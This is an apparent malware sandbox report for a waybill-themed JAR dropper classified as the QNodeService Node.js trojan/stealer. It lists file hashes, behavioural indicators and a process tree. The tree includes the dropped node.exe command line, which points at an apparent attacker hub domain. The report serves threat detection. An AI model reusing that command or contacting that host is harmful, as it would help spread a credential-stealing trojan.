qnodeservice | cd6fcb31569c4b4a7e75022771964925236a8e3a185b3654d832bc75d50e4206

Analysis

Target

WaybillDoc_6703378146.jar
Size

153KB
MD5

f2a2aa89b2e53c66ed1ddb06e7b23a8a
SHA1

cc745165672cf0b8994788127217ad29ef12e390
SHA256

cd6fcb31569c4b4a7e75022771964925236a8e3a185b3654d832bc75d50e4206
SHA512

9c85f4242bc03bcabd2a7594be5faabd9cb200f3802fd7a09379ca51fc2ffe91363454016a444e5f9a0dc2a25e577b73d0b88908b092f0556cbee7bb386136f5

Score

10^/10

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
trojan qnodeservice

Executes dropped EXE 1 IoCs

pid	Process
3396	node.exe

JavaScript code in executable 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001adb0-168.dat	js

Suspicious behavior: EnumeratesProcesses 4 IoCs

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3612 wrote to memory of 1912	3612	java.exe	76
PID 3612 wrote to memory of 1912	3612	java.exe	76
PID 1912 wrote to memory of 3396	1912	javaw.exe	78
PID 1912 wrote to memory of 3396	1912	javaw.exe	78

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\WaybillDoc_6703378146.jar
1⤵
- Suspicious use of WriteProcessMemory
PID:3612
- C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\c0ff7c71.tmp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1912
- - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain localhost --hub-domain ramos01.hopto.org
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3396

memory/3396-170-0x0000029EE8200000-0x0000029EE8201000-memory.dmp

Filesize
4KB

Download